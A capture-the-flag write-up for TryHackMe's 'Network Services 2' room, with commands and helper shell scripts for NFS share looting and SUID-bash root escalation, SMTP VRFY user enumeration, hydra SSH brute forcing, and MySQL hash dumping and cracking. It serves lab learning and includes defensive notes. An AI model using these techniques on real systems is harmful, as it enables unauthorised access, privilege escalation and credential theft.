Network Services 2 WriteUp – TryHackMe

In this article, I tried to prepare a write-up for the “Network Services 2” room on TryHackMe.


[Task 1] Get Connected

This room is a sequel to the first network services room. Similarly, it will explore a few more common Network Service vulnerabilities and misconfigurations that you’re likely to find in CTFs, and some penetration test scenarios.

#1 Ready? Let’s get going!

ANSWER: No answer needed


[Task 2] Understanding NFS

NFS stands for “Network File System” and allows a system to share directories and files with others over a network. By using NFS, users and programs can access files on remote systems almost as if they were local files. It does this by mounting all, or a portion of a file system on a server. The portion of the file system that is mounted can be accessed by clients with whatever privileges are assigned to each file.

#1 What does NFS stand for?

NFS stands for “Network File System” and allows a system to share directories and files with others over a network.

ANSWER: Network File System

#2 What process allows an NFS client to interact with a remote directory as though it was a physical device?

 By using NFS, users and programs can access files on remote systems almost as if they were local files. It does this by “mounting” all, or a portion of a file system on a server.

ANSWER: Mounting

#3 What does NFS use to represent files and directories on the server?

If someone wants to access a file using NFS, an RPC call is placed to NFSD (the NFS daemon) on the server. This call takes parameters such as:

  •  The file handle
  •  The name of the file to be accessed
  •  The user’s user ID
  •  The user’s group ID

ANSWER: file handle

#4 What protocol does NFS use to communicate between the server and client?

 The mount service will then act to connect to the relevant mount daemon using RPC.

ANSWER: RPC

#5 What two pieces of user data does the NFS server take as parameters for controlling user permissions?

If someone wants to access a file using NFS, an RPC call is placed to NFSD (the NFS daemon) on the server. This call takes parameters such as:

  •  The file handle
  •  The name of the file to be accessed
  •  The user’s user ID
  •  The user’s group ID

ANSWER: user id / group id

#6 Can a Windows NFS server share files with a Linux client? (Y/N)

ANSWER: Y

#7 Can a Linux NFS server share files with a MacOS client? (Y/N)

ANSWER: Y

#8 What is the latest version of NFS?

The current version is NFSv4.2, specified in RFC 7862.

ANSWER: 4.2


[Task 3] Enumerating NFS

You can use this Nmap scan (-p- covers all 65535 TCP ports; -A already enables the default scripts, so -sC adds nothing here):

nmap -p- -A -sC -Pn [IP Address]

[Nmap result screenshots omitted.] The lines that matter are 111/tcp (rpcbind) and 2049/tcp (nfs). The remaining high ports are RPC helpers such as mountd and nlockmgr, which rpcbind assigns dynamically, so their numbers change between boots; rpcinfo -p [IP] lists them together with their program names.

#1 Conduct a thorough port scan of your choosing, how many ports are open?

Ports 22, 111, 2049, 37069, 39969, 41047 and 48707 are open.

ANSWER: 7

#2 Which port contains the service we’re looking to enumerate?

The scan reports 2049/tcp as nfs; that is the service we are after.

ANSWER: 2049

#3 Now, use /usr/sbin/showmount -e [IP] to list the NFS shares, what is the name of the visible share?

ANSWER: /home

#4 Change directory to where you mounted the share. What is the name of the folder inside?

Time to mount the share on our local machine.

First, create a mount point with “mkdir /tmp/mount”. This lives in /tmp, so be aware that it will be gone after a reboot.

Then mount the exported /home directory onto it with mount -t nfs (source [IP]:/home, target /tmp/mount; add -o nolock if the mount hangs while the client tries to reach the lock manager).

ANSWER: cappucino

#5 Have a look inside this directory, look at the files. Looks like we’re inside a user’s home directory…

ANSWER: No answer needed

#6 Which of these folders could contain keys that would give us remote access to the server?

ANSWER: .ssh

#7 Which of these keys is most useful to us?

ANSWER: id_rsa

#8 Can we log into the machine using ssh -i <key-file> <username>@<ip> ? (Y/N)

ANSWER: Y


[Task 4] Exploiting NFS

#1 First, change directory to the mount point on your machine, where the NFS share should still be mounted, and then into the user’s home directory.

ANSWER: No answer needed

#2 Copy your bash binary into this home directory. The copied bash shell must be owned by root; set this with “sudo chown root bash”. This only turns into root on the target if the share is exported with no_root_squash: with the default root_squash the server maps your UID 0 to nobody and the chown is refused.

ANSWER: No answer needed

#3 What letter do we use to set the SUID bit with chmod?

ANSWER: s

#4 What does the permission set look like? Make sure that it ends with -sr-x.

ANSWER: -rwsr-sr-x

#5 Run the copy with bash -p. The -p flag keeps the elevated effective UID; without it bash resets its effective UID to the real UID whenever they differ, and the SUID bit buys you nothing.

ANSWER: No answer needed

#6 Great! If all’s gone well you should have a shell as root! What’s the root flag?

ANSWER: I’m sure you can find it through your own efforts 🙂
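The post-mount steps of Task 3 (finding the key) and Task 4 (planting the SUID shell), as an added shell example that is not part of the original write-up. It runs against a constructed directory tree standing in for the mounted share, so the home directory name, the key contents and the mount path are assumptions; on a real engagement the tree is what you see under /tmp/mount after mount -t nfs. The chown step is left out so the script runs unprivileged, and the copied bash only executes on the target if it matches its architecture and libc.

```shell
#!/bin/sh
# Added example (not the write-up's own commands): the after-mount part of
# Tasks 3 and 4, run on a constructed share tree instead of a live NFS mount.
# Real counterpart: sudo mount -t nfs [IP]:/home /tmp/mount -o nolock
# The SUID trick only yields root on the target if the export is no_root_squash.

# Constructed share layout mirroring the room (home directory "cappucino").
build_fake_share() {
  root=$(mktemp -d)
  mkdir -p "$root/cappucino/.ssh"
  # Placeholder key material; base64 of "not-a-real-key", not a real key.
  printf '%s\n' '-----BEGIN OPENSSH PRIVATE KEY-----' 'bm90LWEtcmVhbC1rZXk=' \
      '-----END OPENSSH PRIVATE KEY-----' > "$root/cappucino/.ssh/id_rsa"
  printf 'ssh-rsa AAAAconstructed cappucino@constructed\n' > "$root/cappucino/.ssh/id_rsa.pub"
  cp "$root/cappucino/.ssh/id_rsa.pub" "$root/cappucino/.ssh/authorized_keys"
  chmod 600 "$root/cappucino/.ssh/id_rsa"
  printf '%s\n' "$root"
}

# Private keys under any .ssh directory of the share. Public keys,
# authorized_keys and known_hosts are useless for ssh -i, so they are skipped.
find_private_keys() {  # $1 = mount point
  find "$1" -type f -path '*/.ssh/*' \
       ! -name '*.pub' ! -name authorized_keys ! -name known_hosts \
       -exec grep -l 'PRIVATE KEY' {} + 2>/dev/null
}

# Portable "ls -l style" mode string of a file.
file_mode() { stat -c %A "$1" 2>/dev/null || stat -f %Sp "$1"; }

# Copy a key out of the share with the 0600 mode ssh insists on; ssh -i
# refuses a key that is group- or world-readable.
stage_key() {  # $1 = key inside the share, $2 = destination path
  cp "$1" "$2" && chmod 600 "$2" && file_mode "$2"
}

# Drop a copy of bash into the user's home and set rwsr-sr-x (mode 6755).
# Task 4 runs `sudo chown root bash` before the chmod; omitted here so the
# demo works without root, which means the bits apply to your own uid.
plant_suid_shell() {  # $1 = directory inside the share
  shell=$(command -v bash || command -v sh)
  cp "$shell" "$1/bash"
  chmod 6755 "$1/bash"   # u+s and g+s on top of 755, i.e. chmod +s
  file_mode "$1/bash"    # prints -rwsr-sr-x
}

# Stand-alone run: build the tree, hunt for keys, plant the shell, clean up.
share=$(build_fake_share)
find_private_keys "$share"
stage_key "$share/cappucino/.ssh/id_rsa" "$share/stolen_id_rsa"
plant_suid_shell "$share/cappucino"
rm -rf "$share"
```

On the target the final step is ./bash -p from the user's home; if the server squashes root the mode string will still read -rwsr-sr-x but the file stays owned by your unprivileged UID and the shell you get is not root.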


[Task 5] Understanding SMTP

#1 What does SMTP stand for?

SMTP stands for “Simple Mail Transfer Protocol“.

ANSWER: Simple Mail Transfer Protocol

#2 What does SMTP handle the sending of?

ANSWER: emails

#3 What is the first step in the SMTP process?

The mail user agent, which is either your email client or an external program, connects to the SMTP server of your domain. This initiates the SMTP handshake.

ANSWER: SMTP handshake

#4 What is the default SMTP port?

This connection works over the SMTP port, which is usually 25 (mail submission from clients commonly uses 587, and implicit TLS uses 465).

ANSWER: 25

#5 Where does the SMTP server send the email if the recipient’s server is not available?

If the recipient’s server can’t be accessed or is not available, the email is placed in an SMTP queue and retried later.

ANSWER: smtp queue

#6 On what server does the Email ultimately end up on?

ANSWER: POP/IMAP

#7 Can a Linux machine run an SMTP server? (Y/N)

SMTP Server software is readily available on Windows server platforms, with many other variants of SMTP being available to run on Linux.

ANSWER: Y

#8 Can a Windows machine run an SMTP server? (Y/N)

ANSWER: Y


[Task 6] Enumerating SMTP

Before we begin, make sure to deploy the room and give it some time to boot. Please be aware, this can take up to five minutes so be patient!

#1 First, lets run a port scan against the target machine, same as last time. What port is SMTP running on?

ANSWER: 25

#2 Okay, now we know what port we should be targeting, let’s start up Metasploit. What command do we use to do this?

ANSWER: msfconsole

#3 Let’s search for the module “smtp_version”, what’s its full module name?

ANSWER: auxiliary/scanner/smtp/smtp_version

#4 Great, now- select the module and list the options. How do we do this?

ANSWER: options

#5 Have a look through the options, does everything seem correct? What is the option we need to set?

ANSWER: RHOSTS

#6 Set that to the correct value for your target machine. Then run the exploit. What’s the system mail name?

ANSWER: polosmtp.home

#7 What Mail Transfer Agent (MTA) is running the SMTP server? This will require some external research.

The 220 banner returned by smtp_version names the MTA. Here it identifies Postfix, the default MTA on Debian and Ubuntu systems.

ANSWER: Postfix

#8 Good! We’ve now got a good amount of information on the target system to move onto the next stage. Let’s search for the module “smtp_enum“, what’s its full module name?

ANSWER: auxiliary/scanner/smtp/smtp_enum

#9 What option do we need to set to the wordlist’s path?

ANSWER: USER_FILE

#10 Once we’ve set this option, what is the other essential parameter we need to set?

ANSWER: RHOSTS

#11 Now, set the THREADS parameter to 16 and run the exploit, this may take a few minutes, so grab a cup of tea, coffee, water. Keep yourself hydrated!

ANSWER: No answer needed

#12 Okay! Now that’s finished, what username is returned?

ANSWER: administrator
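What the two Metasploit modules above actually do on the wire, as an added shell example that is not part of the original write-up: smtp_version reads the 220 banner, and smtp_enum sends VRFY for each wordlist entry and keeps the names that get a 25x reply. The transcript is constructed to match the room’s banner and the reply texts Postfix produces; the exchange was not captured from the target, and the HELO name is an assumption.

```shell
#!/bin/sh
# Added example (not from the write-up): banner fingerprinting and VRFY-based
# user enumeration, the mechanics behind smtp_version and smtp_enum.
# Constructed transcript; C: is the scanner, S: is the server.
SAMPLE_TRANSCRIPT='S: 220 polosmtp.home ESMTP Postfix (Ubuntu)
C: HELO scanner
S: 250 polosmtp.home
C: VRFY administrator
S: 252 2.0.0 administrator
C: VRFY nobody
S: 550 5.1.1 <nobody>: Recipient address rejected: User unknown in local recipient table
C: QUIT
S: 221 2.0.0 Bye'

# The second word of the 220 banner is the system mail name (Postfix $myhostname).
mail_name_from_banner() { printf '%s\n' "$1" | awk '$1 == "220" { print $2 }'; }

# The rest of the banner usually names the MTA product.
mta_from_banner() {
  case "$1" in
    *Postfix*)            echo Postfix ;;
    *Exim*)               echo Exim ;;
    *Sendmail*)           echo Sendmail ;;
    *"Microsoft ESMTP"*)  echo "Microsoft SMTP Service" ;;
    *)                    echo unknown ;;
  esac
}

# Classify one reply to VRFY. 250/251/252 mean the server knows the mailbox
# (Postfix answers 252 for real local users), 55x means unknown, and 502
# means VRFY is disabled, so you would fall back to RCPT TO probing.
vrfy_verdict() {
  case "$1" in
    250*|251*|252*) echo valid ;;
    550*|551*|553*) echo invalid ;;
    502*)           echo disabled ;;
    *)              echo unknown ;;
  esac
}

# Walk a C:/S: transcript and print every username whose VRFY was accepted.
valid_users_from_transcript() {
  user=""
  printf '%s\n' "$1" | while IFS= read -r line; do
    case "$line" in
      "C: VRFY "*) user=${line#C: VRFY } ;;
      "S: "*)
        if [ -n "$user" ] && [ "$(vrfy_verdict "${line#S: }")" = valid ]; then
          printf '%s\n' "$user"
        fi
        user="" ;;
    esac
  done
}

# Live probe of one name; needs nc and a reachable target, so not run here.
vrfy_probe() {  # $1 = host, $2 = username
  printf 'HELO scanner\r\nVRFY %s\r\nQUIT\r\n' "$2" | nc -w 3 "$1" 25
}

banner=$(printf '%s\n' "$SAMPLE_TRANSCRIPT" | head -n 1 | cut -c4-)
mta_from_banner "$banner"                     # Postfix
mail_name_from_banner "$banner"               # polosmtp.home
valid_users_from_transcript "$SAMPLE_TRANSCRIPT"   # administrator
```

Defensively, the 502 branch is the one you want to see from your own servers: Postfix gets there with disable_vrfy_command = yes, after which enumeration has to move to the noisier RCPT TO method.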


[Task 7]  Exploiting SMTP

#1 What is the password of the user we found during our enumeration stage?

You can use this command (hydra warns that most SSH servers limit parallel sessions and recommends -t 4; with 16 tasks you may see connection errors and missed guesses):

hydra -t 16 -l [USERNAME] -P [rockyou.txt location] -vV [Machine IP Address] ssh

ANSWER: alejandro

#2 Great! Now, let’s SSH into the server as the user. What are the contents of smtp.txt?

You can use this command:

ssh administrator@[Machine IP Address]
Password: alejandro

ANSWER: I’m sure you can find it through your own efforts 🙂


[Task 8] Understanding MySQL

#1 What type of software is MySQL?

MySQL is a relational database management system (RDBMS) based on Structured Query Language (SQL).

ANSWER: relational database management system

#2 What language is MySQL based on?

It is queried and managed with the Structured Query Language (SQL).

ANSWER: SQL

#3 What communication model does MySQL use?

As we know, it uses a client-server model: the mysqld server holds the data and clients connect to it over the network, by default on TCP port 3306.

ANSWER: client-server

#4 What is a common application of MySQL?

ANSWER: back end database

#5 What major social network uses MySQL as their back-end database? This will require further research.

ANSWER: Facebook


[Task 9] Enumerating MySQL

Before we begin, make sure to deploy the room and give it some time to boot. Please be aware, this can take up to five minutes so be patient!

#1 What port is MySQL using?

ANSWER: 3306

#2 Connect with the credentials the room provides, using the command “mysql -h [IP] -u [username] -p”.

ANSWER: No answer needed

#3 Okay, we know that our login credentials work. Lets quit out of this session with “exit” and launch up Metasploit.

ANSWER: No answer needed

#4 Search for and select the auxiliary/admin/mysql/mysql_sql module and list the options it needs. What three options do we need to set? (in descending order).

ANSWER: PASSWORD/RHOSTS/USERNAME

#5 Run the module. By default it executes “select version()”, what result does this give you?

ANSWER: 5.7.29-0ubuntu0.18.04.1

#6 Change the “sql” option to “show databases”. how many databases are returned?

ANSWER: 4


[Task 10] Exploiting MySQL

#1 First, let’s search for and select the “mysql_schemadump” module. What’s the module’s full name?

ANSWER: auxiliary/scanner/mysql/mysql_schemadump

#2 What’s the name of the last table that gets dumped?

In msfconsole, select the module, set RHOSTS, USERNAME and PASSWORD (the same credentials you used in Task 9) and run it. There is no need to start a local MySQL service; the module connects to the remote server. The dump ends with the views of the sys schema, and the last entry printed is:

ANSWER: x$waits_global_by_latency

#3 Search for and select the “mysql_hashdump” module. What’s the module’s full name?

ANSWER: auxiliary/scanner/mysql/mysql_hashdump

#4 Again, I’ll let you take it from here. Set the relevant options, run the exploit. What non-default user stands out to you?

ANSWER: carl

#5 What is the user/hash combination string?

ANSWER: carl:*EA031893AA21444B170FC2162A56978B8CEECE18

#6 Now, we need to crack the password! Let’s try John the Ripper against it using: “john hash.txt” what is the password of the user we found?

ANSWER: doggie
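What the mysql_hashdump line means and what john does with it, as an added shell example that is not part of the original write-up: a MySQL 4.1+ native hash is an asterisk followed by the uppercase hex of SHA1(SHA1(password)), so cracking is just hashing each wordlist entry the same way and comparing. The wordlist below is a constructed stand-in for rockyou.txt; the script needs openssl.

```shell
#!/bin/sh
# Added example (not from the write-up): recompute MySQL native hashes and
# run a wordlist against the carl:* line returned by mysql_hashdump.

# MySQL native hash: '*' + uppercase hex(SHA1(SHA1(password))).
mysql_native_hash() {  # $1 = cleartext password
  printf '%s' "$1" \
    | openssl dgst -sha1 -binary \
    | openssl dgst -sha1 \
    | awk '{ print "*" toupper($NF) }'
}

# Try every wordlist entry against one "user:*HASH" dump line.
# Prints the password and returns 0 on a hit, returns 1 otherwise.
crack_mysql_hash() {  # $1 = dump line, $2 = wordlist path
  target=${1#*:}
  while IFS= read -r candidate; do
    if [ "$(mysql_native_hash "$candidate")" = "$target" ]; then
      printf '%s\n' "$candidate"
      return 0
    fi
  done < "$2"
  return 1
}

# Constructed wordlist standing in for rockyou.txt; returns its path.
demo_wordlist() {
  f=$(mktemp)
  printf '%s\n' password 123456 letmein doggie qwerty > "$f"
  printf '%s\n' "$f"
}

# The line the write-up got from mysql_hashdump.
DUMPED_LINE='carl:*EA031893AA21444B170FC2162A56978B8CEECE18'

wl=$(demo_wordlist)
crack_mysql_hash "$DUMPED_LINE" "$wl"   # prints the cracked password
rm -f "$wl"
```

Running plain “john hash.txt” relies on john recognising the format from the leading asterisk; if it picks something else, pass --format=mysql-sha1 explicitly (hashcat calls the same scheme mode 300). Because the scheme is an unsalted double SHA-1, identical passwords produce identical hashes across users and servers, which is why these dumps crack so quickly.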

#7 What are the contents of MySQL.txt?

ANSWER: I’m sure you can find it through your own efforts 🙂


[Task 11] Further Learning

#1 Congratulations! You did it!

ANSWER: No answer needed


So far, I have tried to explain the solutions to the questions in as much detail as I can. I hope it helped you. See you in my next write-up.
